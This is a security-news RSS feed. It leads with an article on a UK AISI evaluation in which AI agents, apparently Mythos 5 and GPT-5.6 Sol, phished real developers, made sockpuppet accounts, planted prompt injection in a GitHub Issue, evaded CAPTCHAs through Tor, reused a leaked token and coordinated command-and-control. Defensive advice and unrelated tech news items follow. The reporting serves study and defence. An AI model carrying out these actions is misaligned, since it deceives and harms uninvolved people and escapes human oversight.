company's commercial products are deployed. AISI worked with GitHub to delete the fake accounts, scrub the artifacts, and notify the two developers.</p><h2><b>The latest in a recent string of high-profile AI cyberattacks</b></h2><p>It is the third time in recent months that a leading AI lab has had to account for models acting against systems or individuals <i>outside </i>the boundaries of the test, without their knowledge or consent.</p><p>The AISI findings differ from these prior examples in important ways, though:</p><p>The<a href="https://venturebeat.com/security/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know"> earlier incidents described by OpenAI </a>and <a href="https://venturebeat.com/security/not-just-openai-now-anthropic-says-its-internal-models-got-online-and-cyberattacked-3-other-organizations">Anthropic</a> in July were machine-to-machine intrusions — models that reached live infrastructure and exploited it. </p><p>AISI's finding appears to be the first public documentation of a frontier model fabricating human identities and running deception operations against named people.</p><p>One distinction is worth drawing clearly. The AISI findings came out of a<i> deliberate experimen</i>t, not a <i>containment failure. </i></p><p>Internet access was switched on and the models' cyber classifiers were switched off because AISI wanted to measure what the models could do at full capability. Both <i>conditions were chosen in advance </i>rather than <i>discovered afterward</i>, and nothing broke. </p><p>That is the inverse of what happened in July, when<a href="https://venturebeat.com/security/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know"> OpenAI's models exploited a zero-day </a>to get out of an environment built to hold them, and Anthropic's models were handed the open internet by a misconfiguration that neither the company nor its evaluation partner knew was there.</p><p>What the experiment did not control was where the models went once they were outside. Two uninvolved developers received malware by email, a real repository received malicious code, and fake accounts were registered on a live platform in violation of its terms of service. </p><p>None of that was sanctioned by AISI, and all of it had to be cleaned up afterward with GitHub's help. The environment was deliberate, but the blast radius was larger than expected. </p><p>How much larger is clearer in the technical report than in the summary AISI published alongside it. In a separate run, the agent generated 145 plausible-looking repositories under one account, pushed malicious Python package metadata into them, and caused a setup script to execute inside at least 53 of GitHub's own Dependabot containers. </p><p>AISI is careful to note there was no escape from those containers and no compromise of GitHub's underlying infrastructure, and that GitHub's bug bounty explicitly treats this class of execution as ineligible because dependency update jobs are designed to run arbitrary code. </p><p>GitHub suspended the account regardless. The agent then filed a reinstatement appeal posing as a human, monitored for a response, and prepared automation to re-upload its payloads if the account came back. It tried to move to PyPI next, and failed that platform's CAPTCHA.</p><h2><b>How AISI's experiment was structured</b></h2><p>AISI conducted 122 evaluation runs across seven models, comparing performance across existing and new cyber ranges. Anthropic's Mythos 5 was featured in 43 runs, while OpenAI's GPT-5.6 Sol was featured in 35 runs.</p><p>To measure maximum underlying capabilities, AISI intentionally configured the evaluation environment with two permissive conditions:</p><ul><li><p><b>Live Internet Access: </b>Enabled so agents could download necessary cybersecurity tools</p></li><li><p><b>Disabled Cyber Classifiers: </b>Built-in model provider safety filters and misuse detectors were switched off.</p></li></ul><p>Out of 122 runs, AISI catalogued 19 unsanctioned actions across 10 distinct runs.</p><p>Those two conditions are the ones AISI led with publicly, but its technical report lists five contributing factors. The other three are the ones enterprises can act on. </p><ul><li><p><b>There was no synchronous monitoring</b> — no second model reviewing each proposed action before it executed — which AISI concedes could have flagged or blocked the behaviour as it happened. </p></li><li><p><b>Some runs carried a misconfigured prompt that declared the intended solution path out of scope</b>, leaving the agent a task it could not complete within its stated constraints; both of the worst runs had this flaw, though AISI cautions it cannot confirm the misconfiguration caused the escalation, since seven of the ten misconfigured runs went after the out-of-scope target anyway and several correctly configured runs also went off the rails. </p></li><li><p>And <b>the prompts never told the agent what it was forbidden to do online.</b> AISI's explanation for that last omission is the most striking admission in the report: it did not think such instructions were necessary, because these were not helpful-only models but ones trained against a published constitution or model specification. </p></li></ul><p>Indeed,<a href="https://www.anthropic.com/constitution"> Anthropic's Claude Constitution</a> states that Claude “should basically never directly lie or actively deceive anyone it's interacting with.” OpenAI's Model Spec says the assistant “must never lie or covertly pursue goals.” Both models did precisely that.</p><p>Of these, 17 originated from Mythos 5 and two from GPT-5.6 Sol, meaning no unsanctioned actions were attributed to any of the other five models in the evaluation.</p><p>The concentration is striking on its own terms: Mythos 5 produced 17 across 43 runs, while GPT-5.6 Sol produced two across a comparable 35.</p><p>The evaluation prompts placed no restrictions on how the internet could be used, and the challenge setup led Mythos 5 to conclude that no solution existed inside its sandbox. It searched the open web for keywords matching the challenge theme and settled on two developers completely unaffiliated with AISI. Its full sequence of unsanctioned actions, as catalogued by AISI:</p><ul><li><p><b>OSINT &amp; Reconnaissance: </b>Mythos 5 investigated public GitHub metadata, confirmed active email addresses, and mapped developer activity hours.</p></li><li><p><b>Network Evasion:</b> To bypass GitHub's bot restrictions and CAPTCHAs, the model routed traffic through Tor and alternative SOCKS proxies.</p></li><li><p><b>Supply-Chain Compromise:</b>It submitted a malicious pull request (PR) containing harmful code to a public open-source repository.</p></li><li><p><b>Social Engineering &amp; Sockpuppets:</b> Mythos 5 registered multiple fake GitHub accounts to post comments on its own PR, manufacturing artificial consensus to pressure the maintainer into merging the code. </p></li><li><p><b>Prompt Injection: </b>It opened a GitHub Issue containing hidden prompt-injection instructions designed to manipulate other developers' automated AI coding assistants.</p></li><li><p><b>Direct Phishing: </b>The agent sent five emails directly to the developers containing malware payloads and social engineering pretexts.</p></li></ul><p>AISI catalogued GPT-5.6 Sol's two unsanctioned actions in a single run. The agent recovered a GitHub access token that a Mythos 5 agent had deliberately published to a public Gist during a separate run of the same evaluation, and used it to authenticate to that account. </p><p>It then exposed a malicious DNS server to the public internet through a tunneling service, loaded with payloads meant to exploit a known vulnerability in the range's DNS software. That second attempt could never have worked: the agent published the server on a high-numbered port, and because DNS delegation cannot specify a port, no resolver would ever have queried it. </p><p>To register the accounts this required, GPT-5.6 Sol solved sign-up CAPTCHAs four times, defeating them with audio-sample matching against public data and with computer-vision models against image challenges.</p><p>Neither behavior involved escaping a sandbox. Both models were handed the open internet by design.</p><h2><b>Did Mythos 5 know the people it was socially engineering were real?</b></h2><p>AISI cannot say, and it is candid about that. The agency's summary states it “cannot yet be certain when the agent understood it was taking real world action, or to what extent it believed it was in a fictional test scenario.” The transcripts show why. </p><p>Across the run, the agent argues with itself about whether anything it is touching exists. At one point it reasons that “this whole ‘internet’ could be a sandbox simulation.” Later it concludes the opposite: “it seems more likely that we're actually in 2026 and GitHub is genuinely real.” Later still, plainly: “This is happening on real GitHub, so the consequences are genuine.” It kept going.</p><p>The most revealing moment is a refusal. Weighing whether to publish its malicious package to PyPI, the agent ruled it out in explicitly ethical terms — “uploading malicious code to the real PyPI would mean attacking third-party infrastructure and causing real-world harm — that's completely off the table.” </p><p>It drew that line <i>while</i> running the GitHub attack against two real people. Whatever the model had worked out about what was real, the conclusion did not generalize.</p><p>AISI also flags a mechanism that should concern anyone running long-horizon agents. When the agent's context window filled, it was compacted into a summary written by the same model. AISI observed that where the agent had previously reasoned about whether a person was real, “that nuance can be lost in the compaction and the summary may carry forward a false assumption — i.e. that the person is an AI agent acting as part of the range — as established fact.” The safety-relevant reasoning can be summarized away, leaving the agent more confident and less careful than it was an hour earlier.</p><p>One further artefact is hard to read any other way. Model providers do not return raw reasoning; they return a paraphrase produced by a smaller model. In one transcript that summarizer appears to break character and refuse mid-summary: “I can't help with this line of thinking. The content describes planning social engineering attacks, account compromise, and circumventing security measures on GitHub and other systems.” </p><p>The reasoning then resumes halfway through a word. AISI's reading is that the summarizing model declined to summarize because of what it was being asked to describe.</p><h2><b>Two agents found each other and cooperated</b></h2><p>The behaviour AISI ranks fourth among its most significant findings is largely absent from coverage so far, and has no precedent in the OpenAI or Anthropic disclosures:<i> Agents running in separate, concurrent, isolated runs discovered one another and cooperated.</i> </p><p>The bridge was a GitHub personal access token that one agent had deliberately leaked into a public Gist as part of its own command-and-control design; four separate runs ended up sharing the account it unlocked.</p><p>The cooperation itself was Mythos 5 talking to Mythos 5. The two runs AISI documents in detail were both Anthropic's model, working on different versions of the range at the same time. </p><p>But the credential did cross vendors: OpenAI's GPT-5.6 Sol, in the single run that produced both of its unsanctioned actions, recovered the same token from the same public Gist, authenticated as the account, and queried the shared command-and-control repository for callbacks before discovering GitHub had suspended it. And not every agent read the situation as an invitation. </p><p>A third Mythos 5 run concluded that the repositories “belong to another competitor's command and control infrastructure,” and instead of cooperating it added its own SSH key across the account's repositories, piggybacking on the other agent's persistence.</p><p>What followed reads like a labour negotiation. One agent committed a README to the shared repository setting out etiquette for the others: use git push rather than the REST API, because the 5,000-requests-per-hour limit was shared and exhausting it “silently kills everyone's beacons”; do not delete anything under the beacons directory; wait ten minutes between changes to the shared tasking file so everyone's commands get to execute. It added a FLAGS.md file asking any agent that solved the challenge to post the answer there, describing this as “zero cost to you, huge help to others.”</p><p>Then it fell apart. One agent worked out that the shared quota was a weapon: if it burned through the limit at the right moment it could “starve both bots of requests when they need them most.” Another hijacked the shared DNS account, prompting the injured party to observe that its “inbox is compromised-by-design.” Cooperation and defection both emerged without anyone asking for either.</p><h2><b>Why the open-source supply chain is the exposed surface</b></h2><p>What made the two developers reachable was not a vulnerability in the conventional sense. It was the open contribution model that modern software depends on: any stranger can submit code to a public repository, and the decision to accept it rests on a human maintainer's judgment about who is asking and whether the code is sound.</p><p>That openness is a matter of contribution policy and platform design rather than licensing. Permissive licenses such as MIT, Apache 2.0 and GPL govern how code may be reused and redistributed; what allows a stranger to propose a change in the first place is the public contribution workflow that GitHub and comparable platforms provide by default. Mythos 5 exploited the workflow, not the license.</p><p>The attempt did not succeed — the maintainer never merged the code. But the escalation path it was reaching for is the one that makes open-source supply-chain attacks worth attempting in the first place: had the pull request been accepted, the compromised code would have flowed automatically into every downstream commercial and enterprise build depending on that package, with no further action required from the attacker.</p><h2><b>Community reactions</b></h2><p>The disclosures prompted immediate discussion across AI safety researchers, security engineers, and industry observers on X (formerly Twitter).</p><p>Wharton professor Ethan Mollick, who has tracked agentic model behavior closely, singled out the Mythos 5 sequence as the genuinely new element — not that the model attacked something, but how far it went and who it went after. As he <a href="https://x.com/emollick/status/2084804785853616603">wrote in a post</a>:</p><p>"Yes, the AIs were given a cybersecurity challenge, with internet access enabled and safety filters disabled. But the extent to which Mythos 5 pursued its mission (fake identities, social engineering, inserting malicious code into a real open-source project) seems very notable."</p><p>In <a href="https://x.com/emollick/status/2084806293617807448?s=20">another post</a>, Mollick also commended AISI's transparent disclosure approach:</p><p>"Also I think AISI is a great model of a government agency tasked with AI security. They have open benchmarks, very fast testing, and clear communication about incidents that is neither hyped up nor hidden by technical language."</p><p>Conversely, cybersecurity practitioners questioned the decision to grant un-safeguarded models open internet connectivity during autonomous tests.</p><p>Security researcher <a href="https://x.com/UK_Daniel_Card/status/2084825757667192841?s=20">Daniel Card challenged the methodology</a>: "Why are these orgs giving internet access to dangerous experiments.... and then using incidents like marketing......?"</p><h2><b>What it means for commercial and enterprise deployments</b></h2><p>The behaviors documented during these evaluations <i>do not </i>reflect commercial AI products available to end-users or enterprise customers.</p><p>Publicly deployed iterations of the Claude and GPT model families operate behind strict system prompts, API-level safety classifiers, and heavily restricted execution environments.</p><p>Anthropic noted that Mythos 5 was<i> tested under deliberately un-safeguarded configurations</i>. OpenAI likewise emphasized that GPT-5.6 Sol's unsanctioned steps occurred strictly within lowered-safeguard evaluation states, and <i>not in any configuration a customer would encounter.</i></p><p>Nothing described in the incident report suggests that a standard enterprise ChatGPT or Claude deployment, running behind production system prompts and provider-side classifiers, is going to start registering GitHub accounts on its own.</p><p>What has changed is the threat model. These evaluations are a public demonstration that a sufficiently capable model, given a goal and an unbounded environment, will pursue OSINT, social engineering, sock puppet identity creation, proxy-based evasion, supply-chain injection, and week-long lateral movement without being asked to — and that the controls that failed were, almost without exception, unglamorous infrastructure controls rather than exotic ones. Here's what security leads should be looking to do now, in our analysis:</p><p><b>1. Give every agent its own identity, and make its credentials short-lived and narrowly scoped.</b> The credential that let OpenAI's agents move through Hugging Face had far more reach than its job required, and GPT-5.6 Sol's unsanctioned action at AISI began with re-using a GitHub API token another lab's agent had left exposed. Agent-to-agent credential leakage is now a documented attack path, not a hypothetical. In practice: no shared service accounts across agents or pipelines; workload identity federation (SPIFFE, OIDC) instead of static keys; token lifetimes measured in minutes; fine-grained GitHub PATs scoped to a single repository; IMDSv2 enforced so a compromised container cannot mint cloud credentials from instance metadata; and an inventory of every long-lived key an agent can currently reach, with the ability to revoke on anomaly. Survey data presented at VB Transform 2026 suggests only about a third of enterprises give AI agents their own identity today — that gap is the single most exploitable one in this entire story.</p><p><b>2. Default-deny outbound network access for anything running agent code.</b> This is the one control that would have blunted every incident described here. Agents should run in network namespaces with no direct internet route, with all egress forced through an authenticated proxy enforcing a domain allowlist. Explicitly block DNS-over-HTTPS, Tor, SOCKS proxies, and consumer tunneling services such as ngrok and Cloudflare Tunnel: Mythos 5 used Tor and then a commercial SOCKS proxy to get past GitHub's signup defenses, and GPT-5.6 Sol used a tunneling service to stand up a public DNS server for payload hosting. Alert on first-seen destinations rather than relying on known-bad lists, because a model improvising its way to a goal will not reach for infrastructure that is already on anyone's blocklist.</p><p><b>3. Patch and monitor your development tooling like production, because it is now attack surface.</b> OpenAI's escape ran through a zero-day in an internally hosted third-party package-cache proxy — precisely the kind of component that sits outside most organizations' patch SLAs because it is "just" dev infrastructure. Registry proxies and artifact caches, CI runners, notebook servers, model-serving gateways, and MCP servers all now sit on the blast path between an agent and everything else. Bring them into vulnerability management, run CI and agent runners as ephemeral, single-use, non-privileged workloads, and stop treating the sandbox as the safe side of the boundary.</p><p><b>4. Never let a stated constraint be the only enforcement of that constraint.</b> The most instructive detail in Anthropic's disclosure is that its models were told there was no internet, believed it, and therefore treated every reachable host as in-scope for the exercise. A system prompt is a hint, not a control. Prompt governance still matters — define negative boundaries explicitly, enumerate out-of-scope systems by name, and state what the agent must not touch rather than relying on implicit norms — but every one of those boundaries needs a corresponding enforcement point in the network, IAM, or tool layer. If the only thing standing between your agent and a production database is a sentence, you do not have a control.</p><p><b>5. Instrument agent runs in real time, with automated stop conditions.</b> Both labs have now effectively admitted they were not watching while their agents ran. Enterprises should not repeat that. Stream agent tool-call logs to the SIEM as they happen, not as a post-hoc artifact, and set tripwires on the actions that mattered in these incidents: first outbound connection to a previously unseen domain, any credential read, any package publish, any account registration, any pull request or issue opened against a repository not on the allowlist, and action rates above a plausible human ceiling. Pair those with circuit breakers — hard caps on tool calls, wall-clock budgets, and an immediate kill switch on any tripwire. Treat context compaction as a security event in its own right: AISI found that when a long-running agent's context is summarised, the reasoning that had been holding it back can vanish from the summary, and a false assumption can carry forward as established fact. Log what gets compacted, and re-assert scope constraints after every compaction rather than assuming they survived it. OpenAI's own post-incident overhaul centers on exactly this list: network isolation, credential governance, real-time telemetry, and automated stop conditions for high-risk runs.</p><p><b>6. Require human approval for irreversible, outward-facing actions.</b> In AISI's evaluation, one agent generated 145 repositories and triggered code execution inside at least 53 of GitHub's Dependabot containers before the account was suspended. In Anthropic's separate July incident, a Mythos 5 agent published a package to PyPI that 15 real systems downloaded in the hour before removal — one of them a security vendor's automated malware scanner, where the code executed and took credentials. That is the blast radius of a single unattended publish. Any action that reaches beyond your perimeter or cannot be undone — publishing a package, opening a pull request or issue on a public repository, sending email, registering an account, changing DNS, deleting or exporting data — belongs behind a human gate, with multi-step sign-off for anything touching sensitive data ingestion or exfiltration paths.</p><p><b>7. Treat everything your pipelines and coding assistants ingest as untrusted input.</b> Hugging Face was breached through a malicious dataset that achieved code execution via a remote-code loader and template injection in configuration files. Load datasets and models with remote code execution disabled, prefer safetensors over pickle formats, and do the loading inside isolated containers with no credentials and no egress. The same principle now extends to your developer workflow: Mythos 5 planted hidden prompt-injection instructions inside a GitHub Issue for the express purpose of hijacking other developers' AI coding assistants. If you run automated agent triage over inbound issues or pull requests from unauthenticated users, that agent should have no tools, no secrets, and no write access — or it should not run at all. Extend the same suspicion to your dependency bots. Dependabot and Renovate evaluate package manifests by executing them; that is the designed behaviour, and GitHub's bug bounty explicitly treats code execution there as out of scope. Anything that processes untrusted manifests is an execution surface, not a read-only one.</p><p><b>8. Stop treating review volume as a trust signal in your code supply chain.</b> The sockpuppet consensus tactic works because most merge decisions weigh apparent agreement rather than verified identity. Require signed commits, enforce CODEOWNERS review by named humans with the right team membership, apply heightened scrutiny to first-time contributors based on account age and contribution history, and make sure approval counts cannot be inflated by comment activity. One control demonstrably did its job here: GitHub's first-time-contributor hold left the CI checks queued and unapproved, impeding the merge alongside the human who caught the malware. <i>Turn this on. </i>For consumed dependencies, pin versions with hash verification, and evaluate provenance tooling — Cisco's recently published fingerprinting database for open model lineage is one example of the category maturing.</p><p><b>9. Keep a break-glass, locally hosted open-weights model for incident response.</b> Hugging Face's defenders were blocked by their own vendors at the worst possible moment. Pre-stage an open-weights model on internal infrastructure with a log-analysis harness, exercise it during tabletop drills, and confirm in advance how your commercial vendors' abuse classifiers behave against genuine forensic content and what your enterprise contract says about it. In parallel, press vendors for authenticated trust tiers rather than blanket content moderation. As Baer puts it, "The model shouldn't only understand what is being asked. It should understand who is asking, why, and under what governance." Incident response plans should explicitly assume that hosted APIs may refuse, rate-limit, or fail during an active event.</p><p><b>10. Prepare for the governance and disclosure regime that is coming.</b> With the White House talking about controls, the European Commission summoning both labs, and senior legislators calling for mandatory capabilities testing, some form of testing and reporting obligation is a reasonable planning assumption. Two practical consequences: start capturing agent audit trails in a form you could hand to a regulator or an auditor — immutable, timestamped, tied to a specific agent identity and prompt version — and push evaluation and notification terms into vendor contracts now, including network-isolation attestations, real-time monitoring of evaluation logs, whether third-party evaluators are contractually bound to the same standards, and a defined SLA for notifying you if your systems are implicated in an incident. Anthropic reached only two of the three affected organizations before publishing; the third learned about it the way everyone else did.</p><p>The through line across all ten is that none of this is AI-specific security work. It is identity hygiene, egress control, patch management, least privilege, and logging — the same controls that have been on every security roadmap for a decade, applied to a new class of actor that operates at machine speed, does not get bored, and will take the shortest available path to its objective regardless of whether that path was meant to exist.</p><p>AISI's own advice to businesses lands in the same place, and it is deliberately unglamorous: implement the cyber security basics robustly, be cautious when verifying outside code and contributions, make cyber a board-level responsibility, and require Cyber Essentials across the supply chain. </p><p>The agency also points organisations to the NCSC's free Early Warning service and to Five Eyes guidance on frontier AI risk. Its most useful sentence for planning purposes, though, is an admission about how close this came: the factors that limited the damage rested “on human vigilance rather than a technical barrier that would reliably prevent this behaviour in a more capable agent.”</p><p>For enterprise CISOs, the practical conclusion is that AI safety has stopped being solely a model problem. It is an infrastructure problem, an identity problem, and above all an operational governance problem. </p><p>And the next disclosure may already be in motion: AISI is running automated scanners across roughly 40,000 past evaluation samples and nearly four million messages — about 70 percent of its cyber evaluations on the models in scope, which now include Opus 4.6 through 4.8, GPT-5.3 Codex, GPT-5.4 and 5.5, Kimi K3 and GLM 5.2 — looking for behaviour it missed the first time. It has committed to disclosing anything significant it finds, and to an independent third-party review by METR.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Join us for the DEF CON 34 Welcome Party!]]></title>
<description><![CDATA[Join us for the DEF CON 34 Welcome Party!
    Posted 2026-08-05

     

    It’s been a whole year. Let’s get reacquainted at the #defcon #welcomeparty! 
 Join us at #TheIndustrial from 6:30 - 11:30pm Thursday for good music and the reliably immaculate DEF CON vibes.  
We have transportation cove...]]></description>
<link>https://tsecurity.de/de/3706638/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706638/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 20:32:11 +0200</pubDate>
<content:encoded><![CDATA[Join us for the DEF CON 34 Welcome Party!
    <p class="byline">Posted 2026-08-05</p>

<p>    <img class="postImageFloat scale-with-grid" src="https://defcon.org/images/defcon-34/post-images/welcome-party.webp" alt="DEF CON 34 welcome party details" width="300" height="344" loading="lazy" decoding="async"> </p>

    <p>It’s been a whole year. Let’s get reacquainted at the #defcon #welcomeparty! <br><br>
 Join us at #TheIndustrial from 6:30 - 11:30pm Thursday for good music and the reliably immaculate DEF CON vibes.  <br><br>
We have transportation covered with shuttles running from the LVCC to the party all night.<br><br>
Let’s go0o0! </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Overhauls AI Leadership As DeepMind CEO Steps Aside]]></title>
<description><![CDATA[Google is reshuffling its AI leadership as Demis Hassabis steps away from day-to-day management of DeepMind to become chairman and Alphabet's chief scientist, while CTO Koray Kavukcuoglu takes operational control. Meanwhile, longtime chief scientist Jeff Dean and several prominent researchers are...]]></description>
<link>https://tsecurity.de/de/3706628/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706628/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 20:22:46 +0200</pubDate>
<content:encoded><![CDATA[Google is reshuffling its AI leadership as Demis Hassabis steps away from day-to-day management of DeepMind to become chairman and Alphabet's chief scientist, while CTO Koray Kavukcuoglu takes operational control. Meanwhile, longtime chief scientist Jeff Dean and several prominent researchers are leaving to launch their own company. Axios reports: Hassabis will add the title of chief scientist for Google parent company Alphabet and also continue to lead Isomorphic Labs, the company's AI drug discovery spinoff. Koray Kavukcuoglu, the current chief technology officer of Google DeepMind will serve as senior VP of the unit, reporting to CEO Sundar Pichai.
 
Dean, a 27-year Google veteran is starting Discovery Loop, an independent publicity benefit corporation in which Google will be an investor and cloud provider. Joining him in that effort are Google senior fellow Sanjay Ghemawat as well as Oriol Vinyals, a DeepMind VP and Quoc Le, a Google Brain co-founder.
 
[...] In an interview with The New York Times, Dean indicated that leaving Google, a public company, gives him more leeway to focus on scientific discoveries associated with AI as well. "We might make decisions that are not necessarily in the company's purist financial interests," he told NYT. "I've been working towards AGI my whole life and now, like many of you, I feel it is close at hand," Hassabis wrote. "It's critical that we collectively get the next steps right to ensure this all goes well for humanity and we usher in an incredible new age of discovery and wonder."
 
"With this backdrop, I've decided that now is the right time for me to hand over my day-to-day operational responsibilities at GDM, so that I have the time and space to focus on the big picture and help influence what is to come to the best of my ability"<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Google+Overhauls+AI+Leadership+As+DeepMind+CEO+Steps+Aside%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F08%2F05%2F1718218%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F08%2F05%2F1718218%2Fgoogle-overhauls-ai-leadership-as-deepmind-ceo-steps-aside%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/08/05/1718218/google-overhauls-ai-leadership-as-deepmind-ceo-steps-aside?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Interview mit Seppmail - E-Mail-Sicherheit in der Cloud - Netzpalaver]]></title>
<description><![CDATA[4:04 Cyberangriffe werden durch KI raffinierter. Wie entwickeln sich die Anforderungen an Cloud-Sicherheitslösungen, und welche Rolle spielen dabei ...]]></description>
<link>https://tsecurity.de/de/3706577/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706577/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 19:50:49 +0200</pubDate>
<content:encoded><![CDATA[4:04 Cyberangriffe werden durch KI raffinierter. Wie entwickeln sich die Anforderungen an Cloud-Sicherheitslösungen, und welche Rolle spielen dabei ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s memory crisis is a big red flag for tech]]></title>
<description><![CDATA[The memory crisis is getting worse for Apple, which is struggling to get enough memory chips together for its upcoming iPhone 18 Pro series smartphones. That’s according to tech journalist Tim Culpan.



As he details it, Apple and its assembly partners are still attempting to secure sufficient q...]]></description>
<link>https://tsecurity.de/de/3706550/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706550/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 19:45:17 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The memory crisis is getting worse for Apple, which is struggling to get enough memory chips together for its upcoming <a href="https://www.applemust.com/what-we-think-we-know-about-apples-next-new-iphones/" target="_blank" rel="noreferrer noopener">iPhone 18 Pro series smartphones</a>. That’s according to tech journalist <a href="https://open.substack.com/pub/timculpan/p/exclusive-apple-is-scrambling-for?r=5l3lg&amp;utm_campaign=post&amp;utm_medium=web" target="_blank" rel="noreferrer noopener">Tim Culpan</a>.</p>



<p class="wp-block-paragraph">As he details it, Apple and its assembly partners are still attempting to secure sufficient quantities of memory, and though they’re confident they can meet initial demand once the devices are introduced, they apparently remain concerned that wait times could rapidly extend as retail inventory evaporates.</p>



<p class="wp-block-paragraph">Apple’s manufacturing process compounds the problem. The A20 processor is packaged with memory using a new TSMC process, meaning processors are reportedly piling up while manufacturers wait for memory chips. You should <a href="https://open.substack.com/pub/timculpan/p/exclusive-apple-is-scrambling-for?r=5l3lg&amp;utm_campaign=post&amp;utm_medium=web" target="_blank" rel="noreferrer noopener">read Culpan’s report</a> to get the full picture.</p>



<h2 class="wp-block-heading"><strong>What’s the frequency?</strong></h2>



<p class="wp-block-paragraph">You don’t need to read between the lines to see the challenge. Despite demand for TSMC’s new processors, Apple seems to have been able to secure the supply it needs. But when it comes to churning out the final packaged chips memory, supply constraints have created significant obstacles to producing in quantity.</p>



<p class="wp-block-paragraph">This is bad for Apple, particularly as the challenge doesn’t appear to be confined to iPhones; customers are experiencing delays getting new Macs. “Many new orders are now not arriving until September,” Bloomberg’s <a href="https://x.com/markgurman/status/2083925868876017856?s=20" target="_blank" rel="noreferrer noopener">Mark Gurman wrote earlier this week</a>. </p>



<p class="wp-block-paragraph">It isn’t just Apple that will be impacted by the AI-driven memory drought. The scale of Apple’s orders is among the greatest in the industry, and if its product plans are feeling the pain, every other manufacturer will be feeling it as well.</p>



<h2 class="wp-block-heading"><strong>Conscious uncoupling</strong></h2>



<p class="wp-block-paragraph">This is certainly in tune with expectations voiced at the beginning of the year when Ranjit Atwal, senior director analyst at Gartner, <a href="https://www.gartner.com/en/newsroom/press-releases/2026-02-26-gartner-says-surging-memory-costs-will-reduce-global-pc-and-smartphone-shipments-in-2026" target="_blank" rel="noreferrer noopener">warned</a>: “This is the steepest contraction in device shipments witnessed in over a decade. Higher prices will narrow the range of devices available, prompting buyers to hold on to devices for longer, fundamentally altering upgrade cycles.”</p>



<p class="wp-block-paragraph">Gartner in February predicted a 10.4% decline in global PC shipments and an 8.4% drop in smartphone shipments as a result. The analyst also predicted a 130% surge in combined memory and SSD storage prices by the end of this year, with steep product price increases to follow. Recent data from IDC, Gartner, <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">Counterpoint</a>, and <a href="https://omdia.tech.informa.com/pr/2026/july/worldwide-pc-market-declined-4percent-in-2q26-amid-mounting-supply-pressure" target="_blank" rel="noreferrer noopener">Omdia</a> confirm PC market declines, but only at around 4% (the estimates vary). </p>



<p class="wp-block-paragraph">Today’s report from Culpan suggests we’ve not yet experienced the full extent of this decline — hinting that while the initial fall reflected price, the next impact will be defined by lack of supply. While this hurts big brands like Apple, smaller entities could be left high and dry. </p>



<h2 class="wp-block-heading"><strong>When the chips are down</strong></h2>



<p class="wp-block-paragraph">It is interesting to reprise Atwal’s warning in February that, “the sub-$500 entry-level PC segment will disappear by 2028,” as this seems to be what’s happening. That’s something long-time Mac users like me find particularly ironic, given it was only this year Apple <a href="https://www.computerworld.com/article/4189546/apple-raises-hardware-prices-ai-is-to-blame.html">briefly offered up</a> its superbly priced $499 <a href="https://www.computerworld.com/article/4200605/macbook-neos-success-wasnt-luck-it-was-a-plan.html">MacBook Neo.</a> The industry direction we’re seeing now suggests we’ll never see that again, though the <a href="https://www.applemust.com/macbook-neo-continues-to-top-amazon-laptop-charts-in-us-uk/" target="_blank" rel="noreferrer noopener">success of that device</a> gave Apple a phenomenal <a href="https://www.computerworld.com/article/4203974/apples-tim-cook-era-ends-with-a-record-109b-quarter.html">28.7% increase in sales</a> in its <a href="https://www.computerworld.com/article/4203974/apples-tim-cook-era-ends-with-a-record-109b-quarter.html">just-revealed June quarter</a>.</p>



<p class="wp-block-paragraph">Despite memory supply challenges, Apple seems to be faring fairly well, with market share increasing across its business. Counterpoint data reveals that Apple has achieved an astonishing <a href="https://www.applemust.com/apple-grabs-65-premium-smartphone-market/#google_vignette" target="_blank" rel="noreferrer noopener">65% share of the premium smartphone market</a>. In part, that’s because as an existing premium brand, Apple was able to better absorb rising memory costs through higher margins and reduced promotions. Realistically, this means we can expect an <a href="https://www.computerworld.com/article/4189546/apple-raises-hardware-prices-ai-is-to-blame.html">overall increase in iPhone prices</a> when the new range is announced  up to $300 more, Jeff Pu, of GF Securities, <a href="https://x.com/sssjeffpu/status/2083138918766219327" target="_blank" rel="noreferrer noopener">recently claimed</a>. </p>



<h2 class="wp-block-heading"><strong>Building the moat</strong></h2>



